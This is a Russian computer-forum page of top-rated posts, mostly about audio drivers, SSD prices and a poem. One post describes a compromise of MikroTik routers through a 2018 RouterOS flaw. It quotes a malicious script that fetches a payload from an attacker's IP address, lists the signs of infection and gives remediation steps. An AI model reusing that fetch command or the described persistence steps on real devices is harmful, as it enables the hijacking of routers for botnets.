Перейти к публикации
СофтФорум - всё о компьютерах и не только

Таблица лидеров


Популярные публикации

Отображаются публикации с наибольшей репутацией начиная с 24.01.2019 во всех областях

  1. 1 балл
    Судя по скриншоту система видит только цифровой вывод звука (через HDMI). Попробуйте в диспетчере устройств для "Устройства с поддержкой High Definition Audio" посмотреть другие доступные совместимые драйверы (там иногда системой предлагается несколько вариантов). Если ничего подходящего нет, создайте точку восстановления системы и попробуйте подсунуть в диспетчере устройств для этого устройства драйвер от Windows 7 (той же разрядности, разумеется).
  2. 1 балл
    Спасибо. Взаимно всем всего самого нилучшего ** Когда идёт не по прямой, А вечные кривые. Тогда проблемы с головой, Ни раз не бытовые. А если вечно прямо, то – Лечиться нужно срочно. Могу поспорить – рупь за сто. Ты сумасшедший точно. Равны, что гений, идиот – Болезнь (тут на латыни). Нормальным будет только тот, Кто где-то в середине. ***
  3. 1 балл
    Загрузка за 5 секунд? На м2 винтах вообще все летает. Хорошие агрегаты, правда дорогие, зараза... Но к лету будет сильный обвал цен (прядка 30-40%) на чипы памяти (технологии развиваются, и переход на новый процесс производства принес свои положительные плоды), вместе с ними упадут цены на всю ссд продукцию. Обычные модули памяти тоже упадут в цене, правда не так сильно.
  4. 1 балл
    23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS. Причем уязвимость позволяет узнать логин и пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно. Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро. Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них: /tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http В файлах соответственно mikrotik.php Отключаются все запрещающие правила фаервола. Создаются задачи в планировщике по запуску скрипта. Открывается сокс-прокси на нестандартном порту. Меняются адреса днс-серверов. Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака. Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа. Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации. Ну пару советов по безопасности: IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные. Грамотно настроить фаерволл. В случае если факт взлома был зафиксирован - сменить пароль на микротик. Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533
Таблица лидеров находится в часовом поясе Москва/GMT+03:00


×